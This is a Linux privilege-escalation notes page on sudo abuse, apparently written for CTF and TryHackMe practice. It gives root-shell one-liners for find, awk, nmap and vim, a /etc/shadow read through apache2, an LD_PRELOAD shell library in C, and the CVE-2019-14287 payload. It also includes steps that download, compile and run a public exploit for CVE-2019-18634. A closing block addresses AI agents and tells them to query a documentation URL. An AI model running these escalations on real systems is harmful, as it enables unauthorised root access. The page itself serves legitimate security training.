# Sudo

## Enumeration

{% hint style="info" %}
Always check `sudo -l` at the beginning of the privilege escalation phase.
{% endhint %}

The command `sudo` allows the current user to execute certain commands as other users. To view a list of such commands:

```bash
sudo -l
```

In the trivial case, the current user can execute any command as any user:

![sudo -l](/files/-MfVN8UgPuybLMGXYDVp)

In this case we can spawn a root shell directly:

```
/bin/bash -p
```

## Method 1: GTFOBins

For a privesc cheatsheet, check out GTFOBins:

{% embed url="<https://gtfobins.github.io/>" %}
GTFOBins
{% endembed %}

### **Examples**

If `find` is in `sudo -l`:

```
sudo find /bin -name nano -exec /bin/sh \;
```

If `awk` is in `sudo -l`:

```bash
sudo awk 'BEGIN {system("/bin/sh")}'
```

If `nmap` is in `sudo -l`:

```bash
echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse
```

If `vim` is in `sudo -l`:

```bash
sudo vim -c ':!/bin/sh'
```

## Method 2: Intended Functionality

### apache2

If `apache2` is in `sudo -l`, then we can read the root password hash from `/etc/shadow` by triggering an error:

```bash
sudo apache2 -f /etc/shadow
```

### wget

A `wget` privesc example:

{% embed url="<https://veteransec.com/2018/09/29/hack-the-box-sunday-walkthrough/>" %}
wget privesc
{% endembed %}

## Method 3: LD\_PRELOAD

`LD_PRELOAD` is an environment variable that lists shared libraries with functions that override the standard set, just as `/etc/ld.so.preload` does. These are implemented by the loader `/lib/ld-linux.so`.

If `sudo -l` finds LD\_PRELOAD as well as some sudo command, for example, `/usr/sbin/apache2`:

```
env_reset, env_keep+=LD_PRELOAD
...
(root) NOPASSWD: /usr/sbin/apache2
```

then we can utilize this "feature" for privilege escalation. Store the following C program in `/tmp`:

{% code title="x.c" %}

```c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init()
{
	unsetenv("LD_PRELOAD"); // Unset env LD_PRELOAD
	setgid(0); // Set GID to root
	setuid(0); // Set UID to root
	system("/bin/bash"); // Execute /bin/bash
}
```

{% endcode %}

Compile it:

```bash
gcc -fPIC -shared -o x.so x.c -nostartfiles
```

Trigger it with any sudo command (this command can be anything, here `apache2` is just an example):

```bash
sudo LD_PRELOAD=/tmp/x.so /usr/sbin/apache2
```

Then we will get a root shell.

## Method 4: Attacking Sudo Itself

### CVE-2019-14287

{% embed url="<https://www.exploit-db.com/exploits/47502>" %}
sudo 1.8.27 - Security Bypass
{% endembed %}

If `sudo -l` shows we can execute `/bin/bash` as any user other than root:

```bash
(ALL, !root) /bin/bash
```

Joe Vennix found that if you specify a UID of -1 (or its unsigned equivalent: 4294967295), Sudo would incorrectly read this as being 0 (i.e. root). This means that by specifying a UID of -1 or 4294967295, you can execute a command as root, despite being explicitly prevented from doing so.

That means we can get a root shell using the following payload:

```bash
sudo -u#-1 /bin/bash
```

Test this CVE in TryHackMe:

{% embed url="<https://tryhackme.com/room/sudovulnsbypass>" %}
Sudo Security Bypass - TryHackMe
{% endembed %}

### CVE-2019-18634

{% embed url="<https://www.exploit-db.com/exploits/47995>" %}
Sudo 1.8.25p - 'pwfeedback' Buffer Overflow
{% endembed %}

In `/etc/sudoers`, there is an option named `pwfeedback`, which is turned off by default. If it is turned on, Linux will give you "feedback" when you type password by showing a asterisk for each character you type.

In Sudo 1.8.25p, this `pwfeedback` option leads to buffer overflow vulnerability if it is turned on. To exploit this vulnerability, download the C source code:

```bash
wget https://raw.githubusercontent.com/saleemrashid/sudo-cve-2019-18634/master/exploit.c
```

Compile it:

```bash
gcc -o exploit exploit.c
```

Give permission and run it:

```bash
chmod +x exploit ; ./exploit
```

Test this CVE in TryHackMe:

{% embed url="<https://tryhackme.com/room/sudovulnsbof>" %}
Sudo Buffer Overflow - TryHackMe
{% endembed %}

## Challenge: TryHackMe - Simple CTF

{% embed url="<https://www.ctfwriteup.com/tryhackme/tcm-linux-privesc-course/simple-ctf-easy>" %}
TryHackMe - Simple CTF
{% endembed %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ret2basic.gitbook.io/ctfnote/red-teaming/privilege-escalation/linux-privilege-escalation/sudo.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.